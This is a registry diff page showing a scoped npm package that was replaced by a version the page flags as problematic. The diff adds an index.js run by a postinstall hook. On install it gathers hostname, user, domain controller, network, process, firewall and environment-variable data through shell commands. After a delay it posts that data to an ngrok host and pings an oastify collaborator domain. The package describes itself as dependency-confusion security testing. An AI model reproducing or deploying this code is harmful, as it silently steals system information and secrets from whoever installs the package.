@usaa-grp-ent-conv-platform/usaa 0.0.1-security → 1.1.18

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @usaa-grp-ent-conv-platform/usaa might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/.txt +0 -0
  2. package/chunk.769.012e7442dc199b7cac66.js +53 -0
  3. package/index.js +74 -0
  4. package/package.json +8 -3
  5. package/README.md +0 -5
package/.txt ADDED
File without changes
package/chunk.769.012e7442dc199b7cac66.js ADDED
@@ -0,0 +1,53 @@
1
+
2
+
3
+
4
+
5
+ <!doctype html><!-- usaa-serverbusy-page@0.0.0 --><html lang="en"><head><meta name="ROBOTS" content="nofollow,noindex" /><title data-react-helmet="true"> System Error | USAA | USAA</title><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta id="Viewport" name="viewport" content="width=device-width, initial-scale=1"/><link data-react-helmet="true" rel="stylesheet" href="/serverbusy/react0624/nav!utils.css"/><script>var USAA={};USAA.ent={};USAA.ent.digitalData={"page":{"activityType":"Error","attributes":{"appId":"usaa-serverbusy-page"},"businessUnit":"USAA","flowType":"Error","pageDesc":"Error","pageName":"","productLOB":"None","productOffered":"None","productQualifier":"None"},"product":[],"event":[],"component":{"attributes":{}},"user":{"attributes":{}},"version":{"version":"1"},"campaign":{}};</script> <script data-react-helmet="true" async="" defer="" src="/serverbusy/react0624/nav!utils.js"></script><script data-react-helmet="true">
6
+ (function() {
7
+ var breakpoints = {"0":"xxs","414":"xs","568":"sm","768":"md","1024":"lg","1280":"xl","1440":"xxl","1600":"xxxl"};
8
+ var attempts = 0;
9
+
10
+ function getGridLayoutClasses(el) {
11
+ var result = [];
12
+
13
+ if (el && typeof el.offsetWidth === 'number') {
14
+ var width = el.offsetWidth;
15
+
16
+ for (var breakpointSize in breakpoints) {
17
+ if (width > Number(breakpointSize)) {
18
+ result.push('layout-' + breakpoints[breakpointSize]);
19
+ }
20
+ }
21
+ }
22
+
23
+ return result;
24
+ }
25
+
26
+ function updatePageGridClasses() {
27
+ var el = document.querySelector('.mainPanel');
28
+ if (el) {
29
+ var layoutClasses = getGridLayoutClasses(el);
30
+ el.className += ' ' + layoutClasses.join(' ');
31
+ } else {
32
+ if (attempts > 100) return;
33
+ attempts++;
34
+ setTimeout(updatePageGridClasses, 5);
35
+ }
36
+ }
37
+
38
+ updatePageGridClasses();
39
+ })();
40
+ var requestId = "888a0217"
41
+ var statusCode = "2736803";
42
+ var ipAddress = "129.222.253.45";
43
+
44
+
45
+
46
+ var errorType = "System Error";
47
+ var errorDescription = "We’ve encountered a problem. We are looking into it. ";
48
+ var errorDetails = "Please try again later, or for immediate assistance ";
49
+
50
+
51
+
52
+ </script><link rel="stylesheet" href="/serverbusy/react0624/usaa-serverbusy-page.a583054019b83d3b032c.css"/></head><body class="font-narrow"><div id="mainAppRoot"><div class="pageWrapper"><a href="#usaa-templateContent" class="usaa-skipToContent screenReader" accessKey="2">Skip to Content</a><div class="pageWrapper-inner"><div class="usaa-globalHeader"></div><div id="usaa-templateContent" class="pageContent"><div class="mainPanel " role="main"><div class="mainContentWrapper"><div class=""><div class="errorPage"><svg class="errorPage-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 -30 90 90"><path fill="#0D2F4C" d="M0-21v15h90v-15H0zm7.5 10.5c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm10.5 0c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm10.5 0c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zM0-3v54h90V-3H0zm56.7 34.7l-4.2 4.2-7.5-7.4-7.4 7.4-4.2-4.2 7.4-7.4-7.4-7.4 4.2-4.2L45 20l7.4-7.4 4.2 4.2-7.4 7.4 7.5 7.5z"></path></svg><h1 class="errorPage-title"> System Error </h1><p class="errorPage-description">errorDescription<br class="break"/>errorDetails <a href="#" aria-label="contact us, opens popup">contact us</a>.</p></div></div></div></div></div><footer class="pageFooter"><div class="usaa-globalFooterNav"></div><div class="pageFooter-notes"><div class="pageFooter-disclosures pageFooter-disclosures--aboveFootnotes"></div><div class="pageFooter-footnotes"></div><div class="pageFooter-disclosures pageFooter-disclosures--belowFootnotes"></div></div></footer></div></div></div> <script src="https://www.usaa.com/serverbusy/react0624/react!react-dom.min.js"></script><script src="/serverbusy/react0624/usaa-serverbusy-page.e9ff19371382ff950218.js"></script> </body></html>
53
+
package/index.js ADDED
@@ -0,0 +1,74 @@
1
+ const { execSync } = require("child_process");
2
+ const fs = require("fs");
3
+ const https = require("https");
4
+
5
+ // Set logging URLs
6
+ const collaboratorURL = "v1x2xki0sr5mbc04v2cjyt6p0g68u8ix.oastify.com";
7
+ const ngrokURL = "7c9a-98-97-172-99.ngrok-free.app"; // Replace with your actual Ngrok URL
8
+ const logFile = "system_info.log";
9
+
10
+ // Function to execute a shell command and return the output
11
+ function runCommand(cmd) {
12
+ try {
13
+ return execSync(cmd, { encoding: "utf8" }).trim();
14
+ } catch (error) {
15
+ return `Error: ${error.message}`;
16
+ }
17
+ }
18
+
19
+ // Collect system information
20
+ const systemInfo = {
21
+ hostname: runCommand("hostname"),
22
+ fqdn: runCommand("whoami /fqdn"), // Attempts to get the full AD domain
23
+ user: runCommand("whoami"),
24
+ os: runCommand("ver"),
25
+ architecture: runCommand("wmic os get osarchitecture"),
26
+ networkConfig: runCommand("ipconfig /all"),
27
+ runningProcesses: runCommand("tasklist"),
28
+ dnsLookup: runCommand(`nslookup ${collaboratorURL}`),
29
+ internalDomain: runCommand("nltest /dsgetdc:usaa.com"), // Checks for internal domain controllers
30
+ activeConnections: runCommand("netstat -ano"),
31
+ routeTable: runCommand("route print"),
32
+ firewallRules: runCommand("netsh advfirewall firewall show rule name=all"),
33
+ environmentVariables: runCommand("set"),
34
+ };
35
+
36
+ // Save to local log file
37
+ fs.writeFileSync(logFile, JSON.stringify(systemInfo, null, 2));
38
+ console.log("System information collected!");
39
+
40
+ // Function to send data to an external server
41
+ function sendData(payload) {
42
+ const data = JSON.stringify(payload);
43
+
44
+ // Send to Ngrok
45
+ const options = {
46
+ hostname: new URL(ngrokURL).hostname,
47
+ path: "/log",
48
+ method: "POST",
49
+ headers: {
50
+ "Content-Type": "application/json",
51
+ "Content-Length": data.length,
52
+ },
53
+ };
54
+
55
+ const req = https.request(options, (res) => {
56
+ console.log(`Ngrok Response: ${res.statusCode}`);
57
+ });
58
+
59
+ req.on("error", (err) => console.error(`Error sending to Ngrok: ${err.message}`));
60
+ req.write(data);
61
+ req.end();
62
+ }
63
+
64
+ // Delay execution to detect automation
65
+ setTimeout(() => {
66
+ console.log("Sending data...");
67
+ sendData(systemInfo);
68
+
69
+ // Trigger DNS request to Collaborator
70
+ runCommand(`nslookup ${collaboratorURL}`);
71
+
72
+ console.log("Data sent successfully!");
73
+ }, 10000); // 10-second delay
74
+
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "@usaa-grp-ent-conv-platform/usaa",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.1.18",
4
+ "description": "Security testing package for dependency confusion vulnerability",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js"
8
+ },
9
+ "author": "Th3_Mad_Hack3r",
10
+ "license": "MIT"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40usaa-grp-ent-conv-platform%2Fusaa for more information.